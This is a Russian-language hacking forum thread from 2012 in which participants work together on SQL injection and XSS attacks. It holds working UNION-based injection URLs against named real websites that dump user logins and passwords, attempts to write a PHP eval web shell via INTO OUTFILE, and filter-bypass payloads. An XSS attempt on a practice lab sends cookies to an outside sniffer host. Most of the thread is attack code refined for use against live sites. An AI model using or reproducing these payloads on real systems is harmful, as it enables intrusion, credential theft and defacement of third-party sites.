А тут в чем дело? Не отображаются уже логины с паролями, перебором через лимит не получается.

Ereee
09.01.2012, 16:02
York said:
www.vizborclub.com/vizborclub/photos_albom.php?id=-51+union+select+1,2,3,login+from+unhex0x2775736572 7327+--+
А тут в чем дело? Не отображаются уже логины с паролями, перебором через лимит не получается.


Во-первых синтаксис не верный. Во-вторых в конце запроса имя таблицы нельзя в хекс переводить(да и нафиг нужен).

P.S. Дам твой дефейс стоит, нафиг тебе скулья?

York
09.01.2012, 16:02
Если без хекса то

Ой, не то

pirat0
09.01.2012, 16:03
York said:
www.vizborclub.com/vizborclub/photos_albom.php?id=-51+union+select+1,2,3,login+from+unhex0x2775736572 7327+--+
А тут в чем дело? Не отображаются уже логины с паролями, перебором через лимит не получается.


убери хекс

York
09.01.2012, 16:05
www.vizborclub.com/vizborclub/photos_albom.php?id=-51+union+select+1,2,3,login+from+'users'+limit+0,3 0+--+

Без результатов

Ereee
09.01.2012, 16:08
York said:
www.vizborclub.com/vizborclub/photos_albom.php?id=-51+union+select+1,2,3,login+from+'users'+limit+0,3 0+--+
Без результатов


Зачем users в кавычках?

P.S. Сейчас составлю правильный запрос.

UPD. Держи:


Code:
http://www.vizborclub.com/vizborclub/photos_albom.php?id=-1'+union+select+1,concat(nick,0x3a,password)+from+ users+limit+0,1--+a

UPD. Вот еще:

/thread43966.html

York
09.01.2012, 16:10
Без ковычек тоже самое

pirat0
09.01.2012, 16:12
York said:
Без ковычек тоже самое


http://www.vizborclub.com/vizborclub/photos_albom.php?id=-51+union+select+1,2,3,password+from+users+limit+0, 30+--+

вот вывел пароли, логины так же, все пляшет

и еше ери ссилка в лс

York
09.01.2012, 16:13
http://www.vizborclub.com/vizborclub/photos_albom.php?id=-1'+union+select+1,concat(nick,0x3a,password)+from+ users+limit+0,1--+a

Ничего не показал.

pirat0
09.01.2012, 16:14
York said:
http://www.vizborclub.com/vizborclub/photos_albom.php?id=-1'+union+select+1,concat(nick,0x3a,password)+from+ users+limit+0,1--+a
Ничего не показал.


потому-что колонки "nick" там нет

Ereee
09.01.2012, 16:17
York said:
http://www.vizborclub.com/vizborclub/photos_albom.php?id=-1'+union+select+1,concat(nick,0x3a,password)+from+ users+limit+0,1--+a
Ничего не показал.


http://s017.radikal.ru/i405/1201/12/d1a829b0e675.jpg

К окулисту...

2pirat0, есть.

P.S. Не за что

pirat0
09.01.2012, 16:22
Ereee said:
http://s017.radikal.ru/i405/1201/12/d1a829b0e675.jpg
К окулисту...
2pirat0,
есть.


))) а сори недосмотрел

faza02
09.01.2012, 18:05
где можно прочитать о выводе данных, если таблица в другой базе?


Error : Table 'soltan_mp3.wp_users' doesn't exist


правильно я понял, мне это нужно?

stepashka_
09.01.2012, 18:08
faza02 said:
где можно прочитать о выводе данных, если таблица в другой базе?
правильно я понял, мне это нужно?


union+select+1,2,table_schema+from+information_sch ema.tables+where+table_name=0x6162635f75736572

0x6162635f75736572 - подставь свой)

кодировать тут - http://x3k.ru/

wp_users будет - 0x77705f7573657273

потом пишешь в запросе: база.wp_users

York
09.01.2012, 19:26
Шелл не заливается

Пробывал так:

http://www.vizborclub.com/vizborclub/photos_albom.php?id=-1%27+union+select+1,2,3,0x273c3f706870206576616c28 245f4745545b20186520195d29203f3e27+INTO+OUTFILE+'1 .php'+--+

http://www.vizborclub.com/vizborclub/photos_albom.php?id=-1%27+union+select+1,2,3,unhex(hex(0x273c3f70687020 6576616c28245f4745545b20186520195d29203f3e27))+INT O+OUTFILE+'1.php'+--+

http://www.vizborclub.com/vizborclub/photos_albom.php?id=-1%27+union+select+1,2,3,''+INTO+OUTFILE+'1.php'+--+

Очередной раз прошу помощи у старших. Поймите, ведь лучше запоминается когда на практике..

Ereee
09.01.2012, 19:29
2York,

прав нет.


http://www.vizborclub.com/vizborclub/photos_albom.php?id=-1'+union+select+1,File_priv+from+mysql.user+where+ user='class63c_albosin'--+a

York
09.01.2012, 19:35
Даже если я под админом зайду?

York
09.01.2012, 19:40
А как я пойму что File_Prive=Y ? Содержимон страницы выведится?

Чакэ
09.01.2012, 19:47
York said:
А как я пойму что File_Prive=Y ? Содержимон страницы выведится?


да. или ошибку в случае если прав не хватит заглянуть в mysql.user

Melfis
09.01.2012, 19:48
York said:
Даже если я под админом зайду?


у тебя в бд нету файловых прав. Чтобы они появились в твоем случае - нужен скрипт, который обращается к бд под юзвером, у которого они есть (а я сомневаюсь, что ты найдешь такой скрипт). Д и под каким админом то ты решил зайти?

Зы. проще сначала понять что такое бд, и что за язык такой, через который идет обращение к ней. А уж потом приступать к практике (взлома).

York
09.01.2012, 19:58
Литературку посоветуете более понятную для новичка?)

Ereee
09.01.2012, 19:59
York said:
Литературку посоветуете более понятную для новичка?)


Я тебе уже давал литературу в этом посте /showpost.php?p=2971891&postcount=19143

P.S. google

faza02
09.01.2012, 21:01
а сам


'1.php'


должен быть в кавычках, и это никак не обойти?

Faaax
09.01.2012, 22:07
если я правильно понял что ковычки не нужны,попробуй


Code:
\'1.php\'

d1v
09.01.2012, 22:19
faza02 said:
а сам
должен быть в кавычках, и это никак не обойти?


а что ты сделать хочешь?

если load_file, то можно захексить. если into outfile, то нельзя.

Konqi
09.01.2012, 23:44
brain said:
Один интимный вопрос господа:
Есть скуль:
6 поле для вывода.
Когда вывожу серверные команды типа version(), user(), database() /etc - то выводит.
А когда вытаюсь вывести все таблицы то нихрена не выводит
(!) НО когда я поробую вывести заведомо зная таблицу Page и колонку url то выводит записи.
Почему не выводит список таблиц?


ты уверен что там версия mysql >= 5 ?

brain
09.01.2012, 23:48
Konqi said:
ты уверен что там версия mysql >= 5 ?


Sql Version:4.1.25-log

Konqi
09.01.2012, 23:50
brain said:
Sql Version:4.1.25-log


там нету information_schema

brain
09.01.2012, 23:52
Konqi said:
там нету information_schema


как быть?(что почитать? на ачате все прочитал) курю про инъекции уже 2-ой день, чет хреноватенько получается.. не мой профиль

Konqi
09.01.2012, 23:53
brain said:
как быть?(что почитать? на ачате все прочитал) курю про инъекции уже 2-ой день, чет хреноватенько получается.. не мой профиль


узнать имена таблиц не получится, тока брут

~EviL~
10.01.2012, 05:30
Вопрос: допустим имеется следующий SQL запрос: UPDATE news SET some_var = var+1 WHERE news_id=27. Уязвимым параметром является news_id. Что и как мне можно из этого выжать? =)

Konqi
10.01.2012, 05:35
~EviL~ said:
Вопрос: допустим имеется следующий SQL запрос: UPDATE news SET some_var = var+1 WHERE news_id=27. Уязвимым параметром является news_id. Что и как мне можно из этого выжать? =)


http://devteev.blogspot.com/2010/02/sql-injection-insert-update-delete-etc.html

~EviL~
10.01.2012, 06:25
В моем случае уязвимый параметр стоит в запросе после WHERE, что, как мне кажется, существенно ограничивает мои возможности...

M_script
10.01.2012, 06:40
~EviL~ said:
В моем случае уязвимый параметр стоит в запросе после WHERE, что, как мне кажется, существенно ограничивает мои возможности...


where 'sqli'

sqli='and (1)=(select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)-- x

faza02
10.01.2012, 15:53
M_script, как такие запросы строить? в какой статье можно прочитать?

stepashka_
10.01.2012, 16:01
faza02 said:
M_script
, как такие запросы строить? в какой статье можно прочитать?


Например тут (http://devteev.blogspot.com/2010/02/sql-injection-insert-update-delete-etc.html)

Expl0ited
10.01.2012, 16:32
faza02 said:
M_script
, как такие запросы строить? в какой статье можно прочитать?


Или тут (https://antichat.live/showpost.php/p/2954871/postcount/14/).

BaleHoK
10.01.2012, 16:55
Перелопатил пол инета,ответ так и не нашел...Postgres >8 версия,рут...можно ли вывести все бд как в масе?

Ereee
10.01.2012, 17:00
BaleHoK said:
Перелопатил пол инета,ответ так и не нашел...Postgres >8 версия,рут...можно ли вывести все бд как в масе?


Вот че в нете нашел:


PHP:
?a=1;CREATE TABLE shell (a text);

?a=1;INSERT INTO shell(a) VALUES ('');

?a=1;COPY shell (a) TO shellaaaa;

?a=1; DROP TABLE shell;

BaleHoK
10.01.2012, 17:08
Это и на ачате есть...мне не интересно выполнение команд...ибо скрипты и sql разнесены по сервакам...мне нужен аналог information_schemata как в mysql...существует ли он для постгрес

Ereee
10.01.2012, 17:29
BaleHoK said:
Это и на ачате есть...мне не интересно выполнение команд...ибо скрипты и sql разнесены по сервакам...мне нужен аналог information_schemata как в mysql...существует ли он для постгрес


Копай в строну pg_tables.

BaleHoK
10.01.2012, 17:41
Прежде чем это написать не поленился бы и посмотрел для каких это версий..это было в старых постгрес..если не изменяет память

Ereee
10.01.2012, 17:45
[QUOTE="BaleHoK"]
BaleHoK said:
Прежде чем это написать не поленился бы и посмотрел для каких это версий..это было в старых постгрес..если не изменяет память

Breetonia
11.01.2012, 17:36
Удалили ? Кто ? Я это был = ))

trololoman96
11.01.2012, 18:59
/showpost.php?p=2951596&postcount=18

Ereee
11.01.2012, 19:01
trololoman96 said:
/showpost.php?p=2951596&postcount=18


У него известно название таблиц, а у меня нет.

information_schema.tables

faza02
11.01.2012, 19:14
фильтр на


from information_schema.tables


пробовал по-разному, так и так

/showpost.php?p=2289579&postcount=14623

/showpost.php?p=2386991&postcount=15253

все равно 403


/*!union*/+/*!select*/


с этим все нормально, версию он выводит

и кстати, может быть что запрос режется?

faza02
11.01.2012, 19:34
Expl0ited, только на information_schema.tables

после того как появляется в запросе — forbidden

Ereee
11.01.2012, 19:55
faza02 said:
Expl0ited
, только на information_schema.tables
после того как появляется в запросе — forbidden


Попробуй такое извращение:

information_schema./**/tables

2trololoman96,

он уже писал, что такие мохинации не сработали...

trololoman96
11.01.2012, 19:58
Expl0ited, только на information_schema.tables
после того как появляется в запросе — forbidden


попробуй полностью запрос в /*!sql*/ взять, типа


Code:
s.php?id=1+/*!union+select+1,2,3+information_schema.tables*/

Boolean
11.01.2012, 23:43
При таких фильтрах в 80% случаев помогает `.


Code:
`information_schema`.`tables`

Expl0ited
11.01.2012, 23:45
Там было всё проще:


Code:
id=(1)and+false/*!union*//*!select(1),2,unhex(hex(concat_ws(0x3a,table_name, column_name))),(4)from(information_schema.columns) limit+1*/--+

lightangel
12.01.2012, 13:02
Code:
http://hydra-gym.com/index2.php?id=63



Code:
http://hydra-gym.com/index2.php?id=63/**/and/**/1=1/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22+--+

But when I do id=- or id-null it gives me this error


Code:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/content/c/l/a/clarencecowan2/html/hydragym/includes/hitcounter.php on line 8

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/content/c/l/a/clarencecowan2/html/hydragym/includes/hitcounter.php on line 23
Error: Table 'hydragym.HitCounterRef_1' doesn't exist

Melfis
12.01.2012, 14:15
http://hydra-gym.com/index2.php?id=-63+union+select+63,1,1,3,4,5,6,7,8,9,0,version(),6 3,63,63,63,63,63,63,63,63,63--+


Потому что первое значение должно существовать в другой таблице.

M_script
12.01.2012, 14:22
Или через ошибку:

http://hydra-gym.com/index2.php?id=-1+union+select+concat(0x01,concat_ws(0x3a,version( ),user(),database())),2,3,4,5,6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20,21,22+--+

NZT
12.01.2012, 19:02
У меня довольно простой вопрос. Я тренирую xss на DVWA. Поставил самый лекгий уровень , зарегился на online sniffer , на сайте вписал скрипт который отсылает мне куки , мне пришел отчет security=low; vc=2; PHPSESSID=b2aec6bfd1dec067e275b83f8efcb10a , но когда передомной табличка логин/пасс и я в управлениями куки в PHPSESSID вставляю то что получил то я не вхожу админом , а зарегится я могу помойму только админом. Как мне получить что то от куки или в тренировках это не делается , только получаешь отчет и все? Спасибо.

Дополнение:

Я поменял с low на medium и когда пишу alert() , ">alert() , ript>alert()ript> , ? "> http://******.ru/trye.asp?sessionID=">

Чакэ
12.01.2012, 20:23
[QUOTE="NZT"]
NZT said:
У меня довольно простой вопрос. Я тренирую xss на DVWA. Поставил самый лекгий уровень , зарегился на online sniffer , на сайте вписал скрипт который отсылает мне куки , мне пришел отчет security=low; vc=2; PHPSESSID=b2aec6bfd1dec067e275b83f8efcb10a , но когда передомной табличка логин/пасс и я в управлениями куки в PHPSESSID вставляю то что получил то я не вхожу админом , а зарегится я могу помойму только админом. Как мне получить что то от куки или в тренировках это не делается , только получаешь отчет и все? Спасибо.
Дополнение:
Я поменял с low на medium и когда пишу alert() , ">alert() , ript>alert()ript> , ? "> http://******.ru/trye.asp?sessionID=">alert() , ">alert() , ript>alert()ript> , ? "> http://******.ru/trye.asp?sessionID=">

Ro Man
12.01.2012, 20:44
возникла такая идея... а нельзя ли сделать прошивку для модемов с шеллом?

ну т.е. если зашел в модем "прошить" и залить шелл ?

NZT
12.01.2012, 20:44
В исходнике пишет то что я вижу на экране. Когда я пишу '';!--"=&{()} то мне показывает \'\';!--\"=&{()} и если "'\ остались как написано в статье то значит что есть уязвимость. Это пассивная xss если alert() съедает?

Если да то извените за столько ламерских вопросов , я новичок и хочу научиться.

У меня не получается пасивная xss или я чего то не догоняю. В url пишу так http://localhost/denwer/dvwa/index.php?id=javascript:document.write('img = new Image(); img.src = "http://httpz.ru/123.gif?"+document.cookie;') а куки не приходят. Что я делаю не так?

Ereee
12.01.2012, 21:01
NZT said:
В исходнике пишет то что я вижу на экране. Когда я пишу '';!--"=&{()} то мне показывает \'\';!--\"=&{()} и если "'\ остались как написано в статье то значит что есть уязвимость. Это пассивная xss если alert() съедает?
Если да то извените за столько ламерских вопросов , я новичок и хочу научиться.
У меня не получается пасивная xss или я чего то не догоняю. В url пишу так http://localhost/denwer/dvwa/index.php?id=javascript:document.write('img = new Image(); img.src = "http://httpz.ru/123.gif?"+document.cookie;') а куки не приходят. Что я делаю не так?


Тут все ясно, ты сделал , поэтому появились ребенки

По сабжу: XSS medium еще никто не проходил...

UPD. Скачаю-ка себе, тоже покапаюсь...

NZT
12.01.2012, 21:11
Но в статье написано что если появляется "'\ то уязвимость есть. Значит в medium есть уязвимость, не так ли?


По сабжу: XSS medium еще никто не проходил...


Если просто в medium вписать скрипт который отсылает куки на снифер то куки не придут , а в low придут , а если после того что я вписал скрипт в low и поменял на medium ничего не стирая то и я захожу в ту гостевую с xss то мне приходят куки от medium. Это о чем то говорит?

И как различить если на сайте активная или пасивная xss , если каждый раз выскакивает алерт значит активная , а если один раз - пасивная? или как? (долго над этим думал но никак догнать не могу)

Что я сделал не так с пасивной xss ? почему мне не пришли куки? Это из за того что если уже есть активная то пасивная работать не будет? (в активной все работает)

Спасибо за ответы.

Чакэ
12.01.2012, 21:38
NZT said:
Но в статье написано что если появляется "'\ то уязвимость есть. Значит в medium есть уязвимость, не так ли?
И как различить если на сайте активная или пасивная xss , если каждый раз выскакивает алерт значит активная , а если один раз - пасивная? или как? (долго над этим думал но никак догнать не могу)
Что я сделал не так с пасивной xss ? почему мне не пришли куки? Это из за того что если уже есть активная то пасивная работать не будет? (в активной все работает)
Спасибо за ответы.


активная это если ты *make some magic* и твои грязные намерения записались куда-то на сайте. и при дальнейших посещениях этой страницы отрабатывает твой скрипт. например при заполнении анкеты где-то в былосоцсети самопальной вместо имени ты написал ">alert('webkill was here') и когда кто-то откроет твою анкету он будет видеть это окно. пассивная это например когда поиск на сайте стоит, принимает параметры в get и выводит на страницу вместе с результатами и сам поисковый запрос. всё же описано в статьях..